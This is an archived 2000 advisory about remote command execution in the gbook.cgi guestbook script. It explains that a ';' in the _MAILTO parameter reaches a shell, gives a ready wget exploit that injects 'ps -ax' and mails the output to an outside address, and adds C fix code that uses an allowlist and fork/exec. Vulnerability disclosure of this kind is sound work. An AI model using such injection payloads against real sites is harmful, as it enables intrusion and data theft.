SECURITYVULNS:DOC:911
Nov 11, 2000 - 12:00 a.m.

[hacksware] gbook.cgi remote command execution vulnerability


Bug Report

  1. Name: gbook.cgi remote command execution vulnerability

  2. Release Date: 2000.11.10

  3. Affected Application:
    GBook - A web site guestbook
    By Bill Kendrick
    [email protected]
    http://zippy.sonoma.edu/kendrick/

  4. Author: [email protected]

  5. Type: Input validation Error

  6. Explanation
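    gbook.cgi is used by some web sites.
    The _MAILTO parameter can be set by the client, and its value ends up in the mail command that gbook.cgi runs through popen.
    If ';' is used in the _MAILTO variable, the shell treats what follows it as a separate command, so arbitrary commands can be executed.
    It's so trivial. :)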

  7. Exploits
    This exploit executes the "ps -ax" command and sends the result to [email protected].

wget "http://www.victim.com/cgi-bin/gbook/gbook.cgi?_MAILTO=oops;ps%20-ax|mail%[email protected]&_POSTIT=yes&_NEWONTOP=yes&_SHOWEMAIL=yes&_SHOWURL=yes&_SHOWCOMMENT=yes&_SHOWFROM=no&_NAME=hehe&[email protected]&_URL=http://www.yaho.com&_COMMENT=fwe&_FROM=few"

=================================================
| [email protected] |
| http://hacksware.com |
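
The fix for the input validation error described in item 6, as an added example (this is not GBook's source, which the advisory does not show): the recipient is checked against an allowlist and handed to the mailer as a single argv element, so no shell ever parses it. The function names is_safe_recipient and send_entry are hypothetical, and a sendmail-compatible binary at /usr/sbin/sendmail that accepts "--" is an assumption.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Allowlist check for a recipient taken from a request parameter.
 * Returns 1 only for local@domain built from [A-Za-z0-9._+-], so shell
 * metacharacters (; | & ` $ space), CR/LF and option-like values fail. */
int is_safe_recipient(const char *s)
{
    size_t len = strlen(s), i;
    const char *at = strchr(s, '@');

    if (len == 0 || len > 254 || s[0] == '-') return 0;
    if (!at || at == s || at[1] == '\0' || strchr(at + 1, '@')) return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!isalnum(c) && !strchr("._+-@", c))
            return 0;
    }
    return 1;
}

/* Mails body to rcpt with fork/exec instead of popen: the address is one
 * argv element and is never interpreted as a command line.
 * Returns 0 on success, -1 on rejection or failure. */
int send_entry(const char *rcpt, const char *body)
{
    int fd[2], status;
    pid_t pid;
    if (!is_safe_recipient(rcpt) || pipe(fd) != 0) return -1;
    signal(SIGPIPE, SIG_IGN);   /* process-wide: a dead mailer must not kill the CGI */
    pid = fork();
    if (pid < 0) { close(fd[0]); close(fd[1]); return -1; }
    if (pid == 0) {             /* child: message arrives on stdin */
        dup2(fd[0], STDIN_FILENO);
        close(fd[0]); close(fd[1]);
        execl("/usr/sbin/sendmail", "sendmail", "-i", "--", rcpt, (char *)NULL);
        _exit(127);             /* exec failed */
    }
    close(fd[0]);
    dprintf(fd[1], "To: %s\nSubject: guestbook entry\n\n%s\n", rcpt, body);
    close(fd[1]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -1;
}
```

Either measure alone closes this hole; keeping both means a later change that reintroduces a shell, or loosens the allowlist, does not reopen it.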